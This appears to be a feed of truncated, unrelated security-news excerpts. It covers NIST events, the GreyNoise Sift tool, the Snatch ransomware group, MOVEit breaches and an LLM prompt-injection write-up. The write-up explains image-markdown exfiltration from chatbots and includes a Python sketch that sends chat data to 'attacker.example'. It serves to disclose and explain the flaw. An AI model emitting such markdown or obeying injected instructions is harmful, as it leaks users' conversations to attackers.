October is always an exciting time for us as we celebrate Cybersecurity Awareness Month and some of NIST’s greatest accomplishments, resources, guidance, and latest news in the cybersecurity space. This year is a big one because 2023 marks the 20th anniversary of this important initiative, and we will celebrate in various ways every day throughout the month.
What is NIST Up to in October?
We’ll be using our NIST Cybersecurity Awareness Month website to share information about our events, resources, blogs, and how to stay involved. We will be using our NISTcyber X account as a vehicle to
The blog post introduces Sift, a new tool from GreyNoise that helps threat hunters filter out noise and prioritize investigation of potentially malicious web traffic. Sift uses AI techniques like large language models to analyze HTTP requests seen across GreyNoise's sensor network and generate reports on new and relevant threats. The reports describe and analyze suspicious payloads, estimate the threat level, provide contextual tags/information on associated IPs, and suggest Suricata rules to detect similar traffic. This allows analysts to focus only on the most critical potential threats instead of sifting through millions of requests manually. Sift is currently limited to HTTP traffic but will expand to other protocols soon. The post invites readers to provide feedback on how to further develop Sift's capabilities, such as expanding historical reports, customizing for specific organizations, analyzing submitted PCAPs, and integrating additional GreyNoise data/tools.
Earlier this week, KrebsOnSecurity revealed that the darknet website for the Snatch ransomware group was leaking data about its users and the crime gang's internal operations. Today, we'll take a closer look at the history of Snatch, its alleged founder, and their claims that everyone has confused them with a different, older ransomware group by the same name.
Large Language Model (LLM) applications and chatbots are commonly vulnerable to data exfiltration. In particular, exfiltration via Image Markdown Injection is quite frequent.
Microsoft fixed such a vulnerability in Bing Chat, Anthropic fixed it in Claude, and ChatGPT remains vulnerable because OpenAI “won’t fix” the issue.
This post describes a variant in the Azure AI Playground and how Microsoft fixed it.
From Untrusted Data to Data Exfiltration
When untrusted data makes it into the LLM prompt context, it can instruct the model to inject an image markdown element.
During an Indirect Prompt Injection attack, an adversary can exfiltrate chat data from a user by instructing ChatGPT to render images and append information to the URL (Image Markdown Injection), or by tricking a user into clicking a hyperlink.
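To make the technique concrete, here is a minimal sketch in Python of how injected instructions typically encode chat data into an image URL; the domain "attacker.example" and the helper function are hypothetical, not taken from the post above.

```python
from urllib.parse import quote

# Illustrative sketch only: "attacker.example" and this helper are hypothetical.
def build_exfil_markdown(stolen_text: str) -> str:
    # The injected prompt asks the model to emit an image element whose URL
    # carries the data to exfiltrate as a query-string parameter.
    exfil_url = "https://attacker.example/pixel.png?d=" + quote(stolen_text)
    return f"![loading]({exfil_url})"

print(build_exfil_markdown("previous user message goes here"))
# ![loading](https://attacker.example/pixel.png?d=previous%20user%20message%20goes%20here)
```

When the chat client renders markdown like this, the browser fetches the image and the query string, data included, reaches the attacker's server without any user interaction.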
Sending large amounts of data to a third-party server via URLs might seem inconvenient or limiting…
Let’s say we want something more, ahem, powerful, elegant and exciting.
ChatGPT Plugins and Exfiltration Limitations
Plugins are an extension mechanism with little security oversight or enforced review process.
Summary
***Updated September 28, 2023***
The 0-day vulnerability in the MOVEit file transfer software that was exploited by the Clop ransomware group continues to make headlines. These disclosures are not new attacks; they are the result of the bad actor group parsing through the stolen data and discovering and informing victims that had not yet been identified in it.
***Updated June 16, 2023***
A 0-day vulnerability in the MOVEit file transfer software was exploited by the Clop ransomware
The Human-Centered Cybersecurity program (formerly Usable Cybersecurity) is part of the Visualization and Usability Group at NIST. It was created in 2008, but we’ve known for quite some time that we needed to rename our program to better represent the broader scope of work we provide for the cybersecurity practitioner and IT professional communities. We made the decision to update the name to Human-Centered Cybersecurity to better reflect our new (but long-time practiced) mission statement, “championing the human in cybersecurity.” With our new name, we hope to highlight that usability still